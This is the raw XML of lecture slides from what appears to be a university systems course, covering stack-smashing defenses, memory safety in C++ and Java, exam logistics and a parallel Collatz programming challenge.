      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474203" y="4319104"/>
            <a:ext cx="5212597" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Would this have prevented the Morris Worm exploit?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>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376560" y="1066320"/>
              <a:ext cx="8598240" cy="3760920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Ink 6"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="367200" y="1056960"/>
                <a:ext cx="8616960" cy="3779640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12480322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 1</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Posted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>shortly after class today </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" b="1" dirty="0" smtClean="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>docs.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" b="1" dirty="0" smtClean="0"/>
              <a:t>/forms/d/1G0OjxCKnHfOWzuazXJ9DO5qwDKGs2J32KUhQcMQdzJk/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	6 questions from notes, 2 synthesis questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>11:59pm Thursday (Feb 13) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>pen resources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use anything you want, other than other humans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t post comments relevant to exam on course site 		  between now and Friday</a:t>
            </a:r>
          </a:p>
          <a:p>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18040" y="1566000"/>
              <a:ext cx="7962840" cy="2041920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="508680" y="1556640"/>
                <a:ext cx="7981560" cy="2060640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12574643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379" y="409077"/>
            <a:ext cx="4079765" cy="1412716"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack Smashing Defense #2</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 1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15" name="Rounded Rectangle 1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16" name="Rounded Rectangle 1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17" name="Rounded Rectangle 1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8" name="Rounded Rectangle 1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19" name="Rounded Rectangle 1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20" name="Rounded Rectangle 1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21" name="Rounded Rectangle 2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22" name="Rounded Rectangle 2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23" name="Rounded Rectangle 2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4" name="Rounded Rectangle 2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5" name="Rounded Rectangle 24"/>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6" name="Rounded Rectangle 25"/>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7" name="Rounded Rectangle 26"/>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8" name="Rounded Rectangle 27"/>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9" name="Rounded Rectangle 28"/>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0" name="Rounded Rectangle 29"/>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31" name="Rounded Rectangle 30"/>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32" name="Rounded Rectangle 31"/>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33" name="Rounded Rectangle 32"/>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4" name="Rounded Rectangle 33"/>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35" name="Rounded Rectangle 34"/>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36" name="Curved Connector 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="0"/>
            <a:endCxn id="25"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84400" y="194040"/>
              <a:ext cx="7694640" cy="4424040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="275040" y="184680"/>
                <a:ext cx="7713360" cy="4442760"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19506044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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2013-09-16 at 1.16.28 P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17940" b="8206"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409366" y="104238"/>
            <a:ext cx="7189357" cy="602269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439781" y="390595"/>
            <a:ext cx="16956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November 2009</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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057480" y="673560"/>
              <a:ext cx="3065040" cy="632880"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3048120" y="664200"/>
                <a:ext cx="3083760" cy="651600"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2784044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6" name="Picture 5"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b="52917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275047" y="574716"/>
            <a:ext cx="8522733" cy="2852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94519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7" name="Picture 6"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t="47807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="110868" y="509398"/>
            <a:ext cx="8687934" cy="322349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39120" y="1037160"/>
              <a:ext cx="6527160" cy="2601360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2129760" y="1027800"/>
                <a:ext cx="6545880" cy="2620080"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8786554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9" name="Picture 8" descr="Screen Shot 2013-09-16 at 1.29.55 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="43558"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="256350" y="226387"/>
            <a:ext cx="8335805" cy="1053337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screen Shot 2013-09-16 at 1.3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0" y="1463839"/>
            <a:ext cx="8335805" cy="1620258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2013-09-16 at 1.33.19 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="6941" r="3022" b="9338"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="256350" y="3268216"/>
            <a:ext cx="8348889" cy="134863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6129000" y="167760"/>
              <a:ext cx="2369520" cy="3739680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6119640" y="158400"/>
                <a:ext cx="2388240" cy="3758400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486771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3670077" y="4262436"/>
            <a:ext cx="5016727"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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.phrack.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>issues.html?issue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=61&amp;id=6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2013-09-16 at 1.4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10" y="440489"/>
            <a:ext cx="8369290" cy="316293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548000" y="3357000"/>
              <a:ext cx="5149800" cy="72000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1538640" y="3347640"/>
                <a:ext cx="5168520" cy="90720"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1790615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Doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>t C++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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905046" y="1931134"/>
            <a:ext cx="5210681" cy="1446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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t> 			= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Menlo Regular"/>
              <a:cs typeface="Menlo Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Regular"/>
                <a:cs typeface="Menlo Regular"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0">
              <a:latin typeface="Menlo Regular"/>
              <a:cs typeface="Menlo Regular"/>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4626720" y="3225600"/>
              <a:ext cx="293760" cy="497520"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4617360" y="3216240"/>
                <a:ext cx="312480" cy="516240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419295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599"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn’t Java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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20241438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90160" y="47880"/>
              <a:ext cx="8819640" cy="4852440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="280800" y="38520"/>
                <a:ext cx="8838360" cy="4871160"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36979908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Charge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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823727" y="1315366"/>
            <a:ext cx="7308061" cy="1200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You can use any language you want for PS3, but if your submission has any double-free vulnerabilities, buffer overflow vulnerabilities, or memory leaks you get a -10.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823727" y="2967776"/>
            <a:ext cx="7308061" cy="1200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dirty="0" smtClean="0"/>
              <a:t>Exam 1 will be posted once I get back to my office </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and type ‘make publish’.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Due 11:59pm Thursday.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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285280" y="1690920"/>
              <a:ext cx="5404320" cy="799200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2275920" y="1681560"/>
                <a:ext cx="5423040" cy="817920"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484155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797"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any 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02440" y="499680"/>
              <a:ext cx="7518960" cy="4476960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="793080" y="490320"/>
                <a:ext cx="7537680" cy="4495680"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12484836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216080" y="300240"/>
              <a:ext cx="7718040" cy="3832560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2"/>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1206720" y="290880"/>
                <a:ext cx="7736760" cy="3851280"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20397388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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259563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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Collatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Challenge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Last class…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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258455" y="2087040"/>
            <a:ext cx="6049818" cy="18158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b="1" dirty="0"/>
              <a:t>Challenge: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Write a substantially better </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>find_collatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> program that makes good use of all available cores, and always produces the correct result.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42452571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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247194" y="150616"/>
            <a:ext cx="4936717" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDD9C3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>find_collatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(k: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1"/>
              <a:t>mut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0"/>
              <a:t> n = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>max_tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = 7; // keep all my cores busy                                                                                                                                                                                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>    let </a:t>
            </a:r>
            <a:r>
